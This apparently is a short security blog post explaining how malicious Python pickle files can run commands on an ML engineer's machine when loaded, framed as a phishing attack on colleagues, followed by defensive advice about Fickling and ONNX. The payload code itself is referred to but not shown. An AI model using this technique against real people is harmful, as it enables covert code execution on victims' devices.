Phishing Attack using Machine Learning model
I found 2 of the ML team members transfer Files related to the a model training:
The first was a “serialized” data generated by Python Pickle Module.
The second file was a python script that deserialize the first file.
Knowing That the pickle module requires a huge awareness while implementing.
📌 “Never deserialize data from an untrusted source while using pickle”
but they use it for a reason
The use of pickling conserves memory, enables start-and-stop model training, and makes trained models portable (and, thereby, shareable). Pickling is easy to implement, is built into Python without requiring additional dependencies, and supports serialization of custom objects. There’s little doubt about why choosing pickling for persistence is a popular practice among Python programmers and ML practitioners.
anyway,
The Attack :
Pre-trained models are typically treated as “free” byproducts of ML since they allow the valuable intellectual property like algorithms and corpora that produced the model to remain private. This gives many people the confidence to share their models over the internet, particularly for reusable computer vision and natural language processing classifiers. Websites like **PyTorch Hub** facilitate model sharing, and some libraries even provide APIs to download models from GitHub repositories automatically.
It’s all about creating a malicious pickle files. That the ML engineer would load on his device using Pickle Module in python.
The code I used to create the malicious Payload so you can add it to the Pickle File:
“For more Technical Details and why I used that script Read This”
Example :
add the output to any pickle file and send it to the victim when he loads it using Pickle The command will be executed on his device
Victim view:
When he runs this script for example so he could load the pickle file that i just sent to him
With out checking it,The command will be executed on his device
The code here is being used for some ML stuff(used to predict something I guess) but running it on the malicious pickle file that contains my payload will trigger the system to execute the command :
Here is the output , an attacker would keep everything in the background “Blind”
How to stay safe :
Use Fickling - it has its own implementation of a Pickle Virtual Machine (PM), and it is safe to run on potentially malicious files, because it symbolically executes code rather than overtly executing it.
You can run Fickling’s static analyses to detect certain classes of malicious pickles by passing the
--check-safety
there are other frameworks that avoid using pickle for serialization. For example, the Open Neural Network Exchange (ONNX) aims to provide a universal standard for encoding AI models to improve interoperability. The ONNX specification uses ProtoBuf to encode their model representations.
Last updated